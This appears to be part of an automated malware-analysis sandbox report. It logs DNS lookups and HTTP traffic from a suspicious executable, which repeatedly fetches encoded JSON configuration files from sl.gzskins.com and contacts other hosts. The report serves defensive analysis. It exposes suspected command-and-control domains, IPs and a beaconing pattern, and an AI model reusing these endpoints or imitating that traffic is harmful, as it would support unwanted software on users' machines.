                                                                                                                                            Nov 6, 2024 16:40:33.538804054 CET1.1.1.1192.168.2.100x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.64A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538804054 CET1.1.1.1192.168.2.100x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.40A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538804054 CET1.1.1.1192.168.2.100x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.154A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538804054 CET1.1.1.1192.168.2.100x7c0No error (0)cncidx.m.hub.sandai.net116.132.219.184A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:34.185591936 CET1.1.1.1192.168.2.100x7c5No error (0)download6.mcloud.139.com36.138.50.131A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:35.605325937 CET1.1.1.1192.168.2.100x7c7No error (0)imhub5pr.hz.sandai.net127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:35.770466089 CET1.1.1.1192.168.2.100x7c8No error (0)score.phub.hz.sandai.net127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:36.381460905 CET1.1.1.1192.168.2.100x7c6No error (0)hub5pr.hz.sandai.nethub5pr.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:36.381460905 CET1.1.1.1192.168.2.100x7c6No error (0)hub5pr.sandai.netpr.x.hub.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:36.381460905 CET1.1.1.1192.168.2.100x7c6No error (0)pr.x.hub.sandai.net116.132.219.22A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:36.381460905 CET1.1.1.1192.168.2.100x7c6No error (0)pr.x.hub.sandai.net140.206.220.33A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:41.395823956 CET1.1.1.1192.168.2.100xbb24No error (0)skinx.x1.lolgezi.cc107.148.237.1A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:42.998018026 CET1.1.1.1192.168.2.100xd333No error (0)bjbgp01.baidupcs.combjbgp01.n.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:42.998018026 CET1.1.1.1192.168.2.100xd333No error (0)bjbgp01.n.shifen.com113.200.1.7A (IP address)IN (0x0001)false

                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                            • https:
                                                                                                                                              • download6.mcloud.139.com
                                                                                                                                            • bjbgp01.baidupcs.com
                                                                                                                                            • sl.gzskins.com
                                                                                                                                            • skinx.x1.lolgezi.cc
                                                                                                                                            • 140.206.225.136:80
                                                                                                                                            • 112.64.218.154:80
                                                                                                                                            • 116.132.218.191:80
                                                                                                                                            • 116.132.219.22:80

                                                                                                                                            HTTP Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.1057237180.163.146.103807512C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 6, 2024 16:40:21.416253090 CET142OUTGET / HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Host: sl.gzskins.com
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Nov 6, 2024 16:40:22.406078100 CET804INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: Tengine
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 238
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:22 GMT
                                                                                                                                            X-Tengine-Error: You are forbidden to list buckets
                                                                                                                                            Via: cache28.l2cn2656[0,0,403-1280,M], cache40.l2cn2656[1,0], kunlun7.cn7174[13,13,403-1280,M], kunlun3.cn7174[20,0]
                                                                                                                                            Ali-Swift-Global-Savetime: 1730907622
                                                                                                                                            X-Cache: MISS TCP_MISS dirn:-2:-2
                                                                                                                                            X-Swift-Error: orig response 4XX error
                                                                                                                                            X-Swift-SaveTime: Wed, 06 Nov 2024 15:40:22 GMT
                                                                                                                                            X-Swift-CacheTime: 1
                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                            EagleId: b4a3921717309076222595605e
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 55 52 4c 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1><p>You don't have permission to access the URL on this server.<hr/>Powered by Tengine</body></html>
                                                                                                                                            Nov 6, 2024 16:40:22.407591105 CET162OUTGET /SLVersionConfig.json HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Host: sl.gzskins.com
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Nov 6, 2024 16:40:22.717986107 CET1236INHTTP/1.1 200 OK
                                                                                                                                            Server: Tengine
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 1359
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Date: Wed, 06 Nov 2024 15:01:06 GMT
                                                                                                                                            x-oss-request-id: 672B84B22C1E933631C90322
                                                                                                                                            x-oss-cdn-auth: success
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            x-oss-object-type: Normal
                                                                                                                                            x-oss-storage-class: Standard
                                                                                                                                            x-oss-server-side-encryption: AES256
                                                                                                                                            Content-MD5: ry+XRVjefiaoWlCuVfLNrQ==
                                                                                                                                            x-oss-server-time: 4
                                                                                                                                            Via: cache13.l2cn3130[0,0,304-0,H], cache44.l2cn3130[1,0], kunlun7.cn7174[0,0,200-0,H], kunlun3.cn7174[1,0]
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            ETag: "AF2F974558DE7E26A85A50AE55F2CDAD"
                                                                                                                                            Last-Modified: Mon, 21 Oct 2024 11:20:51 GMT
                                                                                                                                            x-oss-hash-crc64ecma: 4119829755262503702
                                                                                                                                            Age: 2356
                                                                                                                                            Ali-Swift-Global-Savetime: 1730905266
                                                                                                                                            X-Cache: HIT TCP_MEM_HIT dirn:-2:-2
                                                                                                                                            X-Swift-SaveTime: Wed, 06 Nov 2024 15:27:54 GMT
                                                                                                                                            X-Swift-CacheTime: 3600
                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                            EagleId: b4a3921717309076225897118e
                                                                                                                                            Data Raw: 1c 3e 75 4d 56 c1 8a b2 9c 62 2f 12 f7 61 22 7e bb 0b 29 17 f7 65 2a 15 fa 62 46 5f 9c 62 2f 13 f2 61 2a 1e f5 0d 67 78 f5 64 2b 16 f6 66 26 11 9a 2c 40 11 f3 60 2e 12 f6 6d 29 7e bb 0b 29 17 f7 65 2b 15 fa 62 46 5f 9c 62 2f 13 f3 60 2f 1e f5 0d 67 78 f5 64 2b 17 f7 63 26 11 9a 2c 40 11 f3 60 28 10 f6 6d 29 7e bb 0b 29 17 f7 63 28 13 fa 62 46 5f 9c 62 2f 13 f5 62 28 1e f5 0d 67 78 f5 64 2b 11 f6 67 26 11 9a 2c 40 11 f3 60 29 13 f0 6d 29 7e bb 0b 29 17 f7 61 28 12 fa 62 46 5f 9c 62 2f 13 f6 61 28 1e f5 0d 67 78 f5 63 2b 1a f6 67 26 11 9a 2c 40 11 f4 60 22 11 ff 6d 29 7e bb 0b 29 10 f7 69 29 10 fa 62 46 5f 9c 62 28 12 f6 60 22 1e f5 0d 67 78 f5 63 2a 11 f5 68 26 11 9a 2c 40 11 f3 60 2a 12 f4 6d 29 7e bb 0b 29 10 f7 69 29 11 fa 62 46 5f 9c 62 28 13 ff 63 2a 1e f5 0d 67 78 f5 63 2b 1a f6 64 26 11 9a 2c 40 11 f4 60 23 12 f1 6d 29 7e bb 0b 29 10 f7 68 2a 11 fa 62 46 5f 9c 62 28 13 f0 61 29 1e f5 0d 67 78 f5 63 2b 15 f4 60 26 11 9a 2c 40 11 f4 60 2d 11 fe 6d 29 7e bb 0b 29 10 f7 66 2a 10 fa 62 46 5f 9c 62 [TRUNCATED]
                                                                                                                                            Data Ascii: >uMVb/a"~)e*bF_b/a*gxd+f&,@`.m)~)e+bF_b/`/gxd+c&,@`(m)~)c(bF_b/b(gxd+g&,@`)m)~)a(bF_b/a(gxc+g&,@`"m)~)i)bF_b(`"gxc*h&,@`*m)~)i)bF_b(c*gxc+d&,@`#m)~)h*bF_b(a)gxc+`&,@`-m)~)f*bF_b(`.gxc+
                                                                                                                                            Nov 6, 2024 16:40:22.718017101 CET1007INData Raw: f7 63 26 11 9a 2c 40 11 f4 60 2d 13 f5 6d 29 7e bb 0b 29 10 f7 66 2b 12 fa 62 46 5f 9c 62 28 13 f2 62 2e 1e f5 0d 67 78 f5 63 2b 16 f6 69 26 11 9a 2c 40 11 f4 60 2e 12 ff 6d 29 7e bb 0b 29 10 f7 65 2a 10 fa 62 46 5f 9c 62 28 13 f2 60 2e 1e f5 0d
                                                                                                                                            Data Ascii: c&,@`-m)~)f+bF_b(b.gxc+i&,@`.m)~)e*bF_b(`.gxc+`&,@`/m)~)d)bF_b(b-gxc+f&,@`/m*~)c)aF_b(a(gxc+`&,@`(m*~)c*aF_b(a+gxb+d&,@`(m*~)b)
                                                                                                                                            Nov 6, 2024 16:40:22.724719048 CET142OUTGET / HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Host: sl.gzskins.com
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Nov 6, 2024 16:40:23.042407990 CET768INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: Tengine
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 238
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:22 GMT
                                                                                                                                            X-Tengine-Error: You are forbidden to list buckets
                                                                                                                                            Via: cache28.l2cn2656[0,0,403-1280,M], cache40.l2cn2656[1,0], kunlun7.cn7174[0,0,403-0,H], kunlun3.cn7174[4,0]
                                                                                                                                            Age: 0
                                                                                                                                            Ali-Swift-Global-Savetime: 1730907622
                                                                                                                                            X-Cache: HIT TCP_MEM_HIT dirn:-2:-2
                                                                                                                                            X-Swift-SaveTime: Wed, 06 Nov 2024 15:40:22 GMT
                                                                                                                                            X-Swift-CacheTime: 1
                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                            EagleId: b4a3921717309076229088651e
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 55 52 4c 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1><p>You don't have permission to access the URL on this server.<hr/>Powered by Tengine</body></html>
                                                                                                                                            Nov 6, 2024 16:40:23.043690920 CET162OUTGET /SLVersionConfig.json HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Host: sl.gzskins.com
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Nov 6, 2024 16:40:23.354614973 CET1236INHTTP/1.1 200 OK
                                                                                                                                            Server: Tengine
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 1359
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Date: Wed, 06 Nov 2024 15:01:06 GMT
                                                                                                                                            x-oss-request-id: 672B84B22C1E933631C90322
                                                                                                                                            x-oss-cdn-auth: success
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            x-oss-object-type: Normal
                                                                                                                                            x-oss-storage-class: Standard
                                                                                                                                            x-oss-server-side-encryption: AES256
                                                                                                                                            Content-MD5: ry+XRVjefiaoWlCuVfLNrQ==
                                                                                                                                            x-oss-server-time: 4
                                                                                                                                            Via: cache13.l2cn3130[0,0,304-0,H], cache44.l2cn3130[1,0], kunlun7.cn7174[0,0,200-0,H], kunlun3.cn7174[2,0]
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            ETag: "AF2F974558DE7E26A85A50AE55F2CDAD"
                                                                                                                                            Last-Modified: Mon, 21 Oct 2024 11:20:51 GMT
                                                                                                                                            x-oss-hash-crc64ecma: 4119829755262503702
                                                                                                                                            Age: 2357
                                                                                                                                            Ali-Swift-Global-Savetime: 1730905266
                                                                                                                                            X-Cache: HIT TCP_MEM_HIT dirn:-2:-2
                                                                                                                                            X-Swift-SaveTime: Wed, 06 Nov 2024 15:27:54 GMT
                                                                                                                                            X-Swift-CacheTime: 3600
                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                            EagleId: b4a3921717309076232252160e
                                                                                                                                            Data Raw: 1c 3e 75 4d 56 c1 8a b2 9c 62 2f 12 f7 61 22 7e bb 0b 29 17 f7 65 2a 15 fa 62 46 5f 9c 62 2f 13 f2 61 2a 1e f5 0d 67 78 f5 64 2b 16 f6 66 26 11 9a 2c 40 11 f3 60 2e 12 f6 6d 29 7e bb 0b 29 17 f7 65 2b 15 fa 62 46 5f 9c 62 2f 13 f3 60 2f 1e f5 0d 67 78 f5 64 2b 17 f7 63 26 11 9a 2c 40 11 f3 60 28 10 f6 6d 29 7e bb 0b 29 17 f7 63 28 13 fa 62 46 5f 9c 62 2f 13 f5 62 28 1e f5 0d 67 78 f5 64 2b 11 f6 67 26 11 9a 2c 40 11 f3 60 29 13 f0 6d 29 7e bb 0b 29 17 f7 61 28 12 fa 62 46 5f 9c 62 2f 13 f6 61 28 1e f5 0d 67 78 f5 63 2b 1a f6 67 26 11 9a 2c 40 11 f4 60 22 11 ff 6d 29 7e bb 0b 29 10 f7 69 29 10 fa 62 46 5f 9c 62 28 12 f6 60 22 1e f5 0d 67 78 f5 63 2a 11 f5 68 26 11 9a 2c 40 11 f3 60 2a 12 f4 6d 29 7e bb 0b 29 10 f7 69 29 11 fa 62 46 5f 9c 62 28 13 ff 63 2a 1e f5 0d 67 78 f5 63 2b 1a f6 64 26 11 9a 2c 40 11 f4 60 23 12 f1 6d 29 7e bb 0b 29 10 f7 68 2a 11 fa 62 46 5f 9c 62 28 13 f0 61 29 1e f5 0d 67 78 f5 63 2b 15 f4 60 26 11 9a 2c 40 11 f4 60 2d 11 fe 6d 29 7e bb 0b 29 10 f7 66 2a 10 fa 62 46 5f 9c 62 [TRUNCATED]
                                                                                                                                            Data Ascii: >uMVb/a"~)e*bF_b/a*gxd+f&,@`.m)~)e+bF_b/`/gxd+c&,@`(m)~)c(bF_b/b(gxd+g&,@`)m)~)a(bF_b/a(gxc+g&,@`"m)~)i)bF_b(`"gxc*h&,@`*m)~)i)bF_b(c*gxc+d&,@`#m)~)h*bF_b(a)gxc+`&,@`-m)~)f*bF_b(`.gxc+
                                                                                                                                            Nov 6, 2024 16:40:23.354635954 CET1007INData Raw: f7 63 26 11 9a 2c 40 11 f4 60 2d 13 f5 6d 29 7e bb 0b 29 10 f7 66 2b 12 fa 62 46 5f 9c 62 28 13 f2 62 2e 1e f5 0d 67 78 f5 63 2b 16 f6 69 26 11 9a 2c 40 11 f4 60 2e 12 ff 6d 29 7e bb 0b 29 10 f7 65 2a 10 fa 62 46 5f 9c 62 28 13 f2 60 2e 1e f5 0d
                                                                                                                                            Data Ascii: c&,@`-m)~)f+bF_b(b.gxc+i&,@`.m)~)e*bF_b(`.gxc+`&,@`/m)~)d)bF_b(b-gxc+f&,@`/m*~)c)aF_b(a(gxc+`&,@`(m*~)c*aF_b(a+gxb+d&,@`(m*~)b)
                                                                                                                                            Nov 6, 2024 16:40:23.357914925 CET142OUTGET / HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Host: sl.gzskins.com
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Nov 6, 2024 16:40:23.725223064 CET807INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: Tengine
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 238
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:23 GMT
                                                                                                                                            X-Tengine-Error: You are forbidden to list buckets
                                                                                                                                            Via: cache27.l2cn3130[43,43,403-1280,M], cache24.l2cn3130[44,0], kunlun7.cn7174[54,54,403-1280,M], kunlun3.cn7174[57,0]
                                                                                                                                            Ali-Swift-Global-Savetime: 1730907623
                                                                                                                                            X-Cache: MISS TCP_MISS dirn:-2:-2
                                                                                                                                            X-Swift-Error: orig response 4XX error
                                                                                                                                            X-Swift-SaveTime: Wed, 06 Nov 2024 15:40:23 GMT
                                                                                                                                            X-Swift-CacheTime: 1
                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                            EagleId: b4a3921717309076235413592e
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 55 52 4c 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1><p>You don't have permission to access the URL on this server.<hr/>Powered by Tengine</body></html>
                                                                                                                                            Nov 6, 2024 16:40:23.726429939 CET161OUTGET /SLServerConfig.json HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Host: sl.gzskins.com
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Nov 6, 2024 16:40:24.036721945 CET1236INHTTP/1.1 200 OK
                                                                                                                                            Server: Tengine
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 4310
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Date: Wed, 06 Nov 2024 14:45:25 GMT
                                                                                                                                            x-oss-request-id: 672B810553726E3132A019E7
                                                                                                                                            x-oss-cdn-auth: success
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            x-oss-object-type: Normal
                                                                                                                                            x-oss-storage-class: Standard
                                                                                                                                            x-oss-server-side-encryption: AES256
                                                                                                                                            Content-MD5: Jr+I4nMytCTYtGoBNfZdvg==
                                                                                                                                            x-oss-server-time: 4
                                                                                                                                            Via: cache6.l2cn3107[15,14,304-0,H], cache63.l2cn3107[16,0], kunlun5.cn7174[0,0,200-0,H], kunlun3.cn7174[3,0]
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            ETag: "26BF88E27332B424D8B46A0135F65DBE"
                                                                                                                                            Last-Modified: Tue, 05 Nov 2024 13:12:30 GMT
                                                                                                                                            x-oss-hash-crc64ecma: 7128468848774176665
                                                                                                                                            Age: 3298
                                                                                                                                            Ali-Swift-Global-Savetime: 1730904325
                                                                                                                                            X-Cache: HIT TCP_MEM_HIT dirn:-2:-2
                                                                                                                                            X-Swift-SaveTime: Wed, 06 Nov 2024 14:45:25 GMT
                                                                                                                                            X-Swift-CacheTime: 3600
                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                            EagleId: b4a3921717309076239075256e
                                                                                                                                            Data Raw: 1e fb 07 15 11 04 f8 ea 9e 99 5f 6c a0 a0 4d 57 b7 b9 42 59 98 e0 77 11 8c a3 7e 5b b5 b1 45 4c ac be 4b 63 9e 99 5f 7b ab b1 4e 52 a0 80 59 4c a6 b8 4d 4d a0 8d 1c 65 ea 99 5f 7b ab b1 4e 52 a0 80 59 4c a6 b8 4d 4d a0 8d 77 79 9f 96 40 5f a2 8d 60 0d b9 9c 1e 06 b9 9c 1e 0f b9 9c 1d 42 89 e2 50 72 f1 ac 77 11 82 8a 6a 52 a4 b7 71 65 82 8a 6a 52 a4 b7 6f 56 a4 bd 5c 57 aa be 71 68 f0 8f 7f 51 ab b1 73 7a 8f e1 50 68 f0 8f 7f 51 ab b1 73 7a 8f e2 50 68 f0 8f 7f 51 ab b1 73 7a 8f e3 50 68 f7 8f 6b 5f b7 b5 42 61 f4 e3 50 68 f4 8f 7e 4b a8 b2 40 5b 9a e3 50 65 ea 97 76 78 a9 b1 4b 7d ad b1 41 4e ac bf 42 63 9e 83 59 4e b5 bf 5e 4a 93 b5 5e 63 f4 e4 02 0c f4 8b 03 6d b0 a0 5c 51 b7 a4 7a 5b b7 8d 77 7f b5 a0 6d 4d b6 b5 58 4d 98 83 60 7f b5 a0 6d 4d b6 b5 58 4d f4 e0 1d 65 ea 91 5c 4e 84 a3 5f 5b b1 a3 71 65 86 bf 5e 5b 84 a3 5f 5b b1 a3 71 6d 89 93 43 4c a0 91 5f 4d a0 a4 5f 0c f0 e4 77 11 86 bf 5e 5b 84 a3 5f 5b b1 a3 71 65 8c a3 7f 55 ac be 6f 51 b7 b5 69 46 98 e0 77 11 8c a3 7f 55 ac be 6f 51 b7 b5 [TRUNCATED]
                                                                                                                                            Data Ascii: _lMWBYw~[ELKc_{NRYLMMe_{NRYLMMwy@_`BPrwjRqejRoV\WqhQszPhQszPhQszPhk_BaPh~K@[PevxK}ANBcYN^J^cm\Qz[wmMXM`mMXMe\N_[qe^[_[qmCL_M_w^[_[qeUoQiFwUoQiFoQmM
                                                                                                                                            Nov 6, 2024 16:40:24.036740065 CET212INData Raw: 58 4d 80 a8 71 6d 89 93 43 4c a0 91 5f 4d a0 a4 5f 7b bd e2 19 0a 9e ff 6f 51 b7 b5 6d 4d b6 b5 58 4d 80 a8 71 65 86 bf 5e 5b 84 a3 5f 5b b1 a3 69 46 81 b1 58 63 96 9c 6f 51 b7 b5 6d 4d b6 b5 58 4d 80 a8 68 5f b1 e2 18 0c 9e ff 6f 51 b7 b5 6d 4d
                                                                                                                                            Data Ascii: XMqmCL_M_{oQmMXMqe^[_[iFXcoQmMXMh_oQmMXMh_wh__hqm\NX_w\zMM^c\NX_^RXJEPTCRVWO|_@WYP`||
                                                                                                                                            Nov 6, 2024 16:40:24.036753893 CET1236INData Raw: 69 0a e0 92 6a 1b 84 95 09 7b f0 f5 6d 0a e0 e8 68 1b 80 e5 09 06 86 f5 14 0b 9a e2 18 0f f5 e1 15 61 f4 fe 49 46 a0 8b 03 7f b5 a0 68 5f b1 b1 5f 6b b7 bc 71 65 84 a0 5c 6b b5 b4 4d 4a a0 85 5e 52 98 b8 58 4a b5 ea 03 11 b6 bb 45 50 bd fe 54 0f
                                                                                                                                            Data Ascii: ij{mhaIFh__kqe\kMJ^RXJEPTCRVWO|_@W|VCnQa[[w\kMJ^RmN\ZIsqJJXHe\NH_aZwnOVIrGcXN[UKE_OQ
                                                                                                                                            Nov 6, 2024 16:40:24.036782980 CET236INData Raw: 40 51 a4 b4 71 65 90 a2 40 6d a0 a2 5a 57 a6 b5 71 56 b1 a4 5c 4d ff ff 03 5d ad b1 58 10 b6 bb 45 50 bd fe 4f 5d 9e ff 79 4c a9 83 49 4c b3 b9 4f 5b 98 8b 79 4c a9 93 43 50 b1 a2 4d 5d b1 8d 44 4a b1 a0 5f 04 ea ff 5b 49 b2 fe 5f 55 ac be 54 10
                                                                                                                                            Data Ascii: @Qqe@mZWqV\M]XEPO]yLILO[yLCPM]DJ_[I_UT]XLXARyLCPM]wo^QqPe}yYN|_MMCZqxjxj
                                                                                                                                            Nov 6, 2024 16:40:24.057406902 CET1236INData Raw: 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f6 e0 1c 0e f5 e0 1c 0e 87 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e
                                                                                                                                            Data Ascii:
                                                                                                                                            Nov 6, 2024 16:40:24.059947014 CET1040INData Raw: 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e
                                                                                                                                            Data Ascii: |_MMCZqe@Rx}In
                                                                                                                                            Nov 6, 2024 16:40:30.432409048 CET142OUTGET / HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Host: sl.gzskins.com
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Nov 6, 2024 16:40:30.963033915 CET803INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: Tengine
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 238
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:30 GMT
                                                                                                                                            X-Tengine-Error: You are forbidden to list buckets
                                                                                                                                            Via: cache27.l2cn3130[1,0,403-1280,M], cache3.l2cn3130[1,0], kunlun7.cn7174[17,17,403-1280,M], kunlun3.cn7174[19,0]
                                                                                                                                            Ali-Swift-Global-Savetime: 1730907630
                                                                                                                                            X-Cache: MISS TCP_MISS dirn:-2:-2
                                                                                                                                            X-Swift-Error: orig response 4XX error
                                                                                                                                            X-Swift-SaveTime: Wed, 06 Nov 2024 15:40:30 GMT
                                                                                                                                            X-Swift-CacheTime: 1
                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                            EagleId: b4a3921717309076308173929e
